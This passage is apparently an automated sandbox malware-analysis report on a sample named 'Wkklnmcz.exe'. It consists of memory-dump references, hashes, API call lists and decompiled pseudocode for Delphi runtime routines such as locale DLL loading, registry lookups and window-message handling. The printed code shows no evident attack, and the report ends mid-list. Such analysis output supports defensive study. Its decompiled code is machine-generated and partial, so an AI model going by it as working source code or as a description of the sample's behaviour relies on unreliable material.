API ID: String ID: API String ID: Opcode ID: dad37e4eca691e81d1aea2338d8a48cd261f7fb02ffdbb638b78d10b5b5b55dc Instruction ID: 7b438a89f0d56d91ecccd4ec9e28c9abf4c1b66b100fae670ef48f29d20685a6 Opcode Fuzzy Hash: dad37e4eca691e81d1aea2338d8a48cd261f7fb02ffdbb638b78d10b5b5b55dc Instruction Fuzzy Hash: 4190027160100842D50561D95604B460005A7E0341F51C01AA0115658DC7D5C8517561

Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43 Instruction ID: 93f274c54b82353db9cf7ffc6b3f85f9f96d7f4fb82dbc89b857f5f220da980b Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43 Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 53%

E0114FDDA(intOrPtr* __edx, intOrPtr _a4) { void* _t7; intOrPtr _t9; intOrPtr _t10; intOrPtr* _t12; intOrPtr* _t13; intOrPtr _t14; intOrPtr* _t15; _t13 = __edx; _push(_a4); _t14 = *[fs:0x18]; _t15 = _t12; _t7 = E010FCE00( *__edx, *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff); _push(_t13); E01145720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7); _t9 = *_t15; if(_t9 == 0xffffffff) { _t10 = 0; } else { _t10 = *((intOrPtr*)(_t9 + 0x14)); } _push(_t10); _push(_t15); _push( *((intOrPtr*)(_t15 + 0xc))); _push( *((intOrPtr*)(_t14 + 0x24))); return E01145720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n", *((intOrPtr*)(_t14 + 0x20))); } 0x0114fdda 0x0114fde2 0x0114fde5 0x0114fdec 0x0114fdfa 0x0114fdff 0x0114fe0a 0x0114fe0f 0x0114fe17 0x0114fe1e 0x0114fe19 0x0114fe19 0x0114fe19 0x0114fe20 0x0114fe21 0x0114fe22 0x0114fe25 0x0114fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0114FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u , xrefs: 0114FE2B RTL: Enter CriticalSection Timeout (%I64u secs) %d , xrefs: 0114FE01

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@ String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u API String ID: 885266447-3903918235 Opcode ID: 4bad1db470ee570beba5a4ce279f1947e9b46b179cfb4adfa3e9889e8fcfb933 Instruction ID: fbb28d2d54a775c3538ff13e23c531249c72b50af1b8ebceb5f8e62fc96baed8 Opcode Fuzzy Hash: 4bad1db470ee570beba5a4ce279f1947e9b46b179cfb4adfa3e9889e8fcfb933 Instruction Fuzzy Hash: C1F0F632240602BFE6281B89DC02F63BF5AEB44B71F150328F6685A5D1DA62F82086F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Wkklnmcz.exe PID: 5368 Parent PID: 3352 Wkklnmcz.exeCOMMON

Executed Functions

C-Code - Quality: 87%

E00405E80(CHAR* __eax) { CHAR* _v8; void* _v12; char _v15; char _v17; char _v18; char _v22; int _v28; char _v289; long _t44; long _t61; long _t63; CHAR* _t74; struct HINSTANCE__* _t81; struct HINSTANCE__* _t88; CHAR* _t99; CHAR* _t100; intOrPtr _t104; struct HINSTANCE__* _t112; void* _t115; void* _t117; intOrPtr _t118; _t115 = _t117; _t118 = _t117 + 0xfffffee0; _v8 = __eax; GetModuleFileNameA(0, &_v289, 0x105); _v22 = 0; _t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019, &_v12); // executed if(_t44 == 0) { L3: _push(_t115); _push(0x405f85); _push( *[fs:eax]); *[fs:eax] = _t118; _v28 = 5; E00405CBC( &_v289, 0x105); if(RegQueryValueExA(_v12, &_v289, 0, 0, &_v22, &_v28) != 0 && RegQueryValueExA(_v12, E004060EC, 0, 0, &_v22, &_v28) != 0) { _v22 = 0; } _v18 = 0; _pop(_t104); *[fs:eax] = _t104; _push(E00405F8C); return RegCloseKey(_v12); } else { _t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019, &_v12); // executed if(_t61 == 0) { goto L3; } else { _t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019, &_v12); // executed if(_t63 != 0) { lstrcpynA( &_v289, _v8, 0x105); GetLocaleInfoA(GetThreadLocale(), 3, &_v17, 5); _t112 = 0; if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) { _t99 = &(( &_v289)[lstrlenA( &_v289)]); while( *_t99 != 0x2e && _t99 != &_v289) { _t99 = _t99 - 1; } _t74 = &_v289; if(_t99 != _t74) { _t100 = &(_t99[1]); if(_v22 != 0) { lstrcpynA(_t100, &_v22, 0x105 - _t100 - _t74); _t112 = LoadLibraryExA( &_v289, 0, "true"); } if(_t112 == 0 && _v17 != 0) { lstrcpynA(_t100, &_v17, 0x105 - _t100 - &_v289); _t81 = LoadLibraryExA( &_v289, 0, "true"); // executed _t112 = _t81; if(_t112 == 0) { _v15 = 0; lstrcpynA(_t100, &_v17, 0x105 - _t100 - &_v289); _t88 = LoadLibraryExA( &_v289, 0, "true"); // executed _t112 = _t88; } } } } return _t112; } else { goto L3; } } } } 0x00405e81 0x00405e83 0x00405e8b 0x00405e9c 0x00405ea1 0x00405eba 0x00405ec1 0x00405f03 0x00405f05 0x00405f06 0x00405f0b 0x00405f0e 0x00405f11 0x00405f23 0x00405f46 0x00405f66 0x00405f66 0x00405f6a 0x00405f70 0x00405f73 0x00405f76 0x00405f84 0x00405ec3 0x00405ed8 0x00405edf 0x00000000 0x00405ee1 0x00405ef6 0x00405efd 0x00405f9c 0x00405faf 0x00405fb4 0x00405fbd 0x00405fe7 0x00405fec 0x00405feb 0x00405feb 0x00405ffb 0x00406003 0x00406009 0x0040600e 0x00406021 0x00406036 0x00406036 0x0040603a 0x00406059 0x00406069 0x0040606e 0x00406072 0x00406074 0x0040608f 0x0040609f 0x004060a4 0x004060a4 0x00406072 0x0040603a 0x00406003 0x004060ad 0x00000000 0x00000000 0x00000000 0x00405efd 0x00405edf

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,00400000,00461790), ref: 00405E9C RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405EBA RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405ED8 RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405EF6 RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405F3F RegQueryValueExA.ADVAPI32(?,004060EC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001), ref: 00405F5D RegCloseKey.ADVAPI32(?,00405F8C,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F7F lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405F9C GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405FA9 GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405FAF lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405FDA lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406021 LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406031 lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406059 LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406069 lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0040608F LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?), ref: 0040609F

Strings

Software\Borland\Locales , xrefs: 00405EB0, 00405ECE Software\Borland\Delphi\Locales , xrefs: 00405EEC

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales API String ID: 1759228003-2375825460 Opcode ID: e85b8b5f18f98d11f77dd4a75a6bfc4e909d9d51afbd20e7fd9dae12ec9badaa Instruction ID: 78b8716c1d6b3f78e059c23326c5bad80ecdfc9d22bb9ed19f786db41dfff9de Opcode Fuzzy Hash: e85b8b5f18f98d11f77dd4a75a6bfc4e909d9d51afbd20e7fd9dae12ec9badaa Instruction Fuzzy Hash: 6A516F75A4021D7AFB21D6A48C46FEF7BEC9B04744F4401B7BA04F61C2E67C9E448B69

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%

E03595784(CHAR* __eax) { CHAR* _v8; void* _v12; char _v15; char _v17; char _v18; char _v22; int _v28; char _v289; long _t44; long _t61; long _t63; CHAR* _t74; CHAR* _t99; CHAR* _t100; intOrPtr _t104; struct HINSTANCE__* _t112; void* _t115; void* _t117; intOrPtr _t118; _t115 = _t117; _t118 = _t117 + 0xfffffee0; _v8 = __eax; GetModuleFileNameA(0, &_v289, 0x105); _v22 = 0; _t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019, &_v12); // executed if(_t44 == 0) { L3: _push(_t115); _push(0x3595889); _push( *[fs:eax]); *[fs:eax] = _t118; _v28 = 5; L035955C0( &_v289, 0x105); if(RegQueryValueExA(_v12, &_v289, 0, 0, &_v22, &_v28) != 0 && RegQueryValueExA(_v12, 0x35959f0, 0, 0, &_v22, &_v28) != 0) { _v22 = 0; } _v18 = 0; _pop(_t104); *[fs:eax] = _t104; _push(0x3595890); return RegCloseKey(_v12); } else { _t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019, &_v12); // executed if(_t61 == 0) { goto L3; } else { _t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019, &_v12); // executed if(_t63 != 0) { lstrcpynA( &_v289, _v8, 0x105); GetLocaleInfoA(GetThreadLocale(), 3, &_v17, 5); _t112 = 0; if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) { _t99 = &(( &_v289)[lstrlenA( &_v289)]); L12: if( *_t99 != 0x2e && _t99 != &_v289) { _t99 = _t99 - 1; goto L12; } _t74 = &_v289; if(_t99 != _t74) { _t100 = &(_t99[1]); if(_v22 != 0) { lstrcpynA(_t100, &_v22, 0x105 - _t100 - _t74); _t112 = LoadLibraryExA( &_v289, 0, "true"); } if(_t112 == 0 && _v17 != 0) { lstrcpynA(_t100, &_v17, 0x105 - _t100 - &_v289); _t112 = LoadLibraryExA( &_v289, 0, "true"); if(_t112 == 0) { _v15 = 0; lstrcpynA(_t100, &_v17, 0x105 - _t100 - &_v289); _t112 = LoadLibraryExA( &_v289, 0, "true"); } } } } return _t112; } else { goto L3; } } } } 0x03595785 0x03595787 0x0359578f 0x035957a0 0x035957a5 0x035957be 0x035957c5 0x03595807 0x03595809 0x0359580a 0x0359580f 0x03595812 0x03595815 0x03595827 0x0359584a 0x0359586a 0x0359586a 0x0359586e 0x03595874 0x03595877 0x0359587a 0x03595888 0x035957c7 0x035957dc 0x035957e3 0x00000000 0x035957e5 0x035957fa 0x03595801 0x035958a0 0x035958b3 0x035958b8 0x035958c1 0x035958eb 0x035958f0 0x035958f3 0x035958ef 0x00000000 0x035958ef 0x035958ff 0x03595907 0x0359590d 0x03595912 0x03595925 0x0359593a 0x0359593a 0x0359593e 0x0359595d 0x03595972 0x03595976 0x03595978 0x03595993 0x035959a8 0x035959a8 0x03595976 0x0359593e 0x03595907 0x035959b1 0x00000000 0x00000000 0x00000000 0x03595801 0x035957e3

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,03590000,035A8790), ref: 035957A0 RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03590000,035A8790), ref: 035957BE RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03590000,035A8790), ref: 035957DC RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 035957FA RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,03595889,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03595843 RegQueryValueExA.ADVAPI32(?,035959F0,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,03595889,?,80000001), ref: 03595861 RegCloseKey.ADVAPI32(?,03595890,00000000,?,?,00000000,03595889,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03595883 lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 035958A0 GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 035958AD GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 035958B3 lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 035958DE lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03595925 LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03595935 lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0359595D LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0359596D lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 03595993 LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?), ref: 035959A3

Strings

Software\Borland\Locales , xrefs: 035957B4, 035957D2 Software\Borland\Delphi\Locales , xrefs: 035957F0

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales API String ID: 1759228003-2375825460 Opcode ID: d551439c07bc57ea5b78872035c7fc67d6917aed912681b89cc1593768a13f77 Instruction ID: 16f6051be00e6bd08f50994a285147eb0eeb0868e3b23d2a38377ce3780333e3 Opcode Fuzzy Hash: d551439c07bc57ea5b78872035c7fc67d6917aed912681b89cc1593768a13f77 Instruction Fuzzy Hash: 9651D875A0031E7EFF22D6A4EC45FEFB7BCAB45740F5404A3AA04EA191E6749B44CB60

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%

E0045603C(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) { struct HWND__* _v8; struct HWND__* _v12; void* __ebx; void* __esi; void* __ebp; signed int _t161; struct HWND__* _t162; struct HWND__* _t163; void* _t166; struct HWND__* _t176; struct HWND__* _t185; struct HWND__* _t188; struct HWND__* _t189; struct HWND__* _t191; struct HWND__* _t197; struct HWND__* _t199; struct HWND__* _t202; struct HWND__* _t205; struct HWND__* _t206; struct HWND__* _t216; struct HWND__* _t217; struct HWND__* _t222; struct HWND__* _t224; struct HWND__* _t227; struct HWND__* _t231; struct HWND__* _t239; struct HWND__* _t248; struct HWND__* _t252; struct HWND__* _t254; struct HWND__* _t255; struct HWND__* _t267; intOrPtr _t270; struct HWND__* _t273; struct HWND__* _t274; struct HWND__* _t276; intOrPtr* _t277; struct HWND__* _t285; struct HWND__* _t287; void* _t307; signed int _t309; struct HWND__* _t315; struct HWND__* _t316; struct HWND__* _t317; void* _t318; intOrPtr _t342; struct HWND__* _t346; intOrPtr _t368; void* _t372; struct HWND__* _t377; void* _t378; void* _t379; intOrPtr _t380; _t318 = __ecx; _push(_t372); _v12 = __edx; _v8 = __eax; _push(_t379); _push(0x456706); _push( *[fs:edx]); *[fs:edx] = _t380; *(_v12 + 0xc) = 0; _t307 = *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xb0)) + 8)) - 1; if(_t307 < 0) { L5: E00455EF0(_v8, _t318, _v12); _t309 = *_v12; _t161 = _t309; __eflags = _t161 - 0x53; if(__eflags > 0) { __eflags = _t161 - 0xb017; if(__eflags > 0) { __eflags = _t161 - 0xb020; if(__eflags > 0) { _t162 = _t161 - 0xb031; __eflags = _t162; if(_t162 == 0) { _t163 = _v12; __eflags = *((intOrPtr*)(_t163 + 4)) - 1; if( *((intOrPtr*)(_t163 + 4)) != 1) { *(_v8 + 0xb8) = *(_v12 + 8); } else { *(_v12 + 0xc) = *(_v8 + 0xb8); } L105: _t166 = 0; _pop(_t342); *[fs:eax] = _t342; goto L106; } __eflags = _t162 + 0xfffffff2 - 2; if(_t162 + 0xfffffff2 - 2 < 0) { *(_v12 + 0xc) = E00458554(_v8, *(_v12 + 8), _t309) & 0x0000007f; } else { L104: E00455FB4(_t379); // executed } goto L105; } if(__eflags == 0) { _t176 = _v12; __eflags = *(_t176 + 4); if( *(_t176 + 4) != 0) { E00456E20(_v8, _t318, *( *(_v12 + 8)), *((intOrPtr*)( *(_v12 + 8) + 4))); } else { E00456DC4(_v8, *( *(_v12 + 8)), *((intOrPtr*)( *(_v12 + 8) + 4))); } goto L105; } _t185 = _t161 - 0xb01a; __eflags = _t185; if(_t185 == 0) { _t188 = IsIconic( *(_v8 + 0x30)); __eflags = _t188; if(_t188 == 0) { _t189 = GetFocus(); _t346 = _v8; __eflags = _t189 - *((intOrPtr*)(_t346 + 0x30)); if(_t189 == *((intOrPtr*)(_t346 + 0x30))) { _t191 = E0044CB68(0); __eflags = _t191; if(_t191 != 0) { SetFocus(_t191); } } } goto L105; } __eflags = _t185 == 5; if(_t185 == 5) { L93: E00457374(_v8, *(_v12 + 8), *(_v12 + 4) & 0x0000ffff); goto L105; } else { goto L104; } } if(__eflags == 0) { _t197 = *(_v8 + 0x44); __eflags = _t197; if(_t197 != 0) { _t311 = _t197; _t199 = E004423F8(_t197); __eflags = _t199; if(_t199 != 0) { _t202 = IsWindowEnabled(E004423F8(_t311)); __eflags = _t202; if(_t202 != 0) { _t205 = IsWindowVisible(E004423F8(_t311)); __eflags = _t205; if(_t205 != 0) { *0x4626c0 = 0; _t206 = GetFocus(); SetFocus(E004423F8(_t311)); E0043BC9C(_t311, *(_v12 + 4), 0x112, *(_v12 + 8)); SetFocus(_t206); *0x4626c0 = 1; *(_v12 + 0xc) = 1; } } } } goto L105; } __eflags = _t161 - 0xb000; if(__eflags > 0) { _t216 = _t161 - 0xb001; __eflags = _t216; if(_t216 == 0) { _t217 = _v8; __eflags = *((short*)(_t217 + 0x132)); if( *((short*)(_t217 + 0x132)) != 0) { *((intOrPtr*)(_v8 + 0x130))(); } goto L105; } __eflags = _t216 == 0x15; if(_t216 == 0x15) { _t222 = E00456B84(_v8, _t318, _v12); __eflags = _t222; if(_t222 != 0) { *(_v12 + 0xc) = 1; } goto L105; } else { goto L104; } } if(__eflags == 0) { _t224 = _v8; __eflags = *((short*)(_t224 + 0x13a)); if( *((short*)(_t224 + 0x13a)) != 0) { *((intOrPtr*)(_v8 + 0x138))(); } goto L105; } _t227 = _t161 - 0x112; __eflags = _t227; if(_t227 == 0) { _t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020; __eflags = _t231; if(_t231 == 0) { E0045676C(_v8); } else { __eflags = _t231 == 0x100; if(_t231 == 0x100) { E00456830(_v8); } else { E00455FB4(_t379); } } goto L105; } _t239 = _t227 + 0xffffffe0 - 7; __eflags = _t239; if(_t239 < 0) { *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t309 + 0xbc00, *(_v12 + 4), *(_v12 + 8)); goto L105; } __eflags = _t239 == 0x1e1; if(_t239 == 0x1e1) { E0042DCD8(E0042DB74()); goto L105; } else { goto L104; } } if(__eflags == 0) { goto L93; } __eflags = _t161 - 0x14; if(__eflags > 0) { __eflags = _t161 - 0x1d; if(__eflags > 0) { _t248 = _t161 - 0x37; __eflags = _t248; if(_t248 == 0) { *(_v12 + 0xc) = E00456750(_v8); goto L105; } __eflags = _t248 == 0x13; if(_t248 == 0x13) { _t252 = _v12; __eflags = *((intOrPtr*)( *((intOrPtr*)(_t252 + 8)))) - 0xde534454; if( *((intOrPtr*)( *((intOrPtr*)(_t252 + 8)))) == 0xde534454) { _t254 = _v8; __eflags = *((char*)(_t254 + 0xa6)); if( *((char*)(_t254 + 0xa6)) != 0) { _t255 = _v8; __eflags = *(_t255 + 0xa8); if( *(_t255 + 0xa8) != 0) { *(_v12 + 0xc) = 0; } else { _t315 = E0040DDC0("vcltest3.dll", _t309, 0x8000); *(_v8 + 0xa8) = _t315; __eflags = _t315; if(_t315 == 0) { *(_v12 + 0xc) = GetLastError(); *(_v8 + 0xa8) = 0; } else { *(_v12 + 0xc) = 0; _t377 = GetProcAddress( *(_v8 + 0xa8), "RegisterAutomation"); _t316 = _t377; __eflags = _t377; if(_t377 != 0) { _t267 = *(_v12 + 8); _t316->i( *((intOrPtr*)(_t267 + 4)), *((intOrPtr*)(_t267 + 8))); } } } } } goto L105; } else { goto L104; } } if(__eflags == 0) { _t270 = *0x466584; // 0x27c66a0 E00455244(_t270); E00455FB4(_t379); goto L105; } _t273 = _t161 - 0x16; __eflags = _t273; if(_t273 == 0) { _t274 = _v12; __eflags = *(_t274 + 4); if( *(_t274 + 4) != 0) { E0040D818(); E00404648(); } goto L105; } _t276 = _t273 - 4; __eflags = _t276; if(_t276 == 0) { _t277 = *0x462ed4; // 0x4664ec E00447478( *_t277, _t318, *(_v12 + 4)); E00455F48(_v8, _t309, _t318, _v12, _t372); E00455FB4(_t379); goto L105; } __eflags = _t276 == 2; if(_t276 == 2) { E00455FB4(_t379); _t285 = _v12; __eflags = *((intOrPtr*)(_t285 + 4)) - 1; asm("sbb eax, eax"); *((char*)(_v8 + 0xa5)) = _t285 + 1; _t287 = _v12; __eflags = *(_t287 + 4); if( *(_t287 + 4) == 0) { E00455CBC(); PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0); } else { E00455D1C(_v8); PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0); } goto L105; } else { goto L104; } } if(__eflags == 0) { *_v12 = 0x27; E00455FB4(_t379); goto L105; } __eflags = _t161 - 0x11; if(_t161 > 0x11) { goto L104; } switch( *((intOrPtr*)(_t161 * 4 + &M004560E0))) { case 0: 0 = E0042048C(0, __ebx, __edi, __esi); goto L105; case 1: goto L104; case 2: _push(0); _push(0); _push(0xb01a); _v8 = *(_v8 + 0x30); _push( *(_v8 + 0x30)); L0040717C(); __eax = E00455FB4(__ebp); goto L105; case 3: __eax = _v12; __eflags = *(__eax + 4); if( *(__eax + 4) == 0) { __eax = E00455FB4(__ebp); __eax = _v8; __eflags = *(__eax + 0xb4); if( *(__eax + 0xb4) == 0) { __eflags = *0x4626d4; if( *0x4626d4 == 0) { __eax = _v8; __eax = *(_v8 + 0x30); __eax = E0044CA08( *(_v8 + 0x30), __ebx, __edi, __esi); __edx = _v8; *(_v8 + 0xb4) = __eax; } } _v8 = L00455CC4(); } else { __eflags = *0x4626d4; if( *0x4626d4 == 0) { _v8 = E00455D1C(_v8); __eax = _v8; __eax = *(_v8 + 0xb4); __eflags = __eax; if(__eax != 0) { __eax = _v8; __edx = 0; __eflags = 0; *(_v8 + 0xb4) = 0; } } __eax = E00455FB4(__ebp); } goto L105; case 4: __eax = _v8; __eax = *(_v8 + 0x30); _push(__eax); L004070DC(); __eflags = __eax; if(__eax == 0) { __eax = E00455FB4(__ebp); } else { __eax = E00455FF0(__ebp); } goto L105; case 5: __eax = _v8; __eax = *(_v8 + 0x44); __eflags = __eax; if(__eax != 0) { __eax = E004532AC(__eax, __ecx); } goto L105; case 6: __eax = _v12; *(_v12 + 0xc) = 1; goto L105; } } else { _t317 = _t307 + 1; _t378 = 0; L2: L2: if( *((intOrPtr*)(E0041A80C( *((intOrPtr*)(_v8 + 0xb0)), _t378)))() == 0) { goto L4; } else { _t166 = 0; _pop(_t368); *[fs:eax] = _t368; } L106: return _t166; L4: _t378 = _t378 + 1; _t317 = _t317 - 1; __eflags = _t317; if(_t317 != 0) { goto L2; } goto L5; } } 0x0045603c 0x00456043 0x00456045 0x00456048 0x0045604d 0x0045604e 0x00456053 0x00456056 0x0045605e 0x0045606d 0x00456070 0x004560a4 0x004560aa 0x004560b2 0x004560b4 0x004560b6 0x004560b9 0x0045616a 0x0045616f 0x004561c0 0x004561c5 0x004561e6 0x004561e6 0x004561eb 0x0045667c 0x0045667f 0x00456683 0x0045669f 0x00456685 0x00456691 0x00456691 0x004566fc 0x004566fc 0x004566fe 0x00456701 0x00000000 0x00456701 0x004561f4 0x004561f7 0x004564d7 0x004561fd 0x004566f5 0x004566f6 0x004566fb 0x00000000 0x004561f7 0x004561c7 0x00456643 0x00456646 0x0045664a 0x00456672 0x0045664c 0x0045665a 0x0045665a 0x00000000 0x0045664a 0x004561cd 0x004561cd 0x004561d2 0x004565f1 0x004565f6 0x004565f8 0x004565fe 0x00456603 0x00456606 0x00456609 0x00456611 0x00456616 0x00456618 0x0045661f 0x0045661f 0x00456618 0x00456609 0x00000000 0x004565f8 0x004561d8 0x004561db 0x00456629 0x00456639 0x00000000 0x004561e1 0x00000000 0x004561e1 0x004561db 0x00456171 0x00456504 0x00456507 0x00456509 0x0045650f 0x00456513 0x00456518 0x0045651a 0x00456528 0x0045652d 0x0045652f 0x0045653d 0x00456542 0x00456544 0x0045654a 0x00456551 0x00456560 0x00456579 0x0045657f 0x00456584 0x0045658e 0x0045658e 0x00456544 0x0045652f 0x0045651a 0x00000000 0x00456509 0x00456177 0x0045617c 0x004561a7 0x004561a7 0x004561ac 0x004565c2 0x004565c5 0x004565cd 0x004565df 0x004565df 0x00000000 0x004565cd 0x004561b2 0x004561b5 0x004564e5 0x004564ea 0x004564ec 0x004564f5 0x004564f5 0x00000000 0x004561bb 0x00000000 0x004561bb 0x004561b5 0x0045617e 0x0045659a 0x0045659d 0x004565a5 0x004565b7 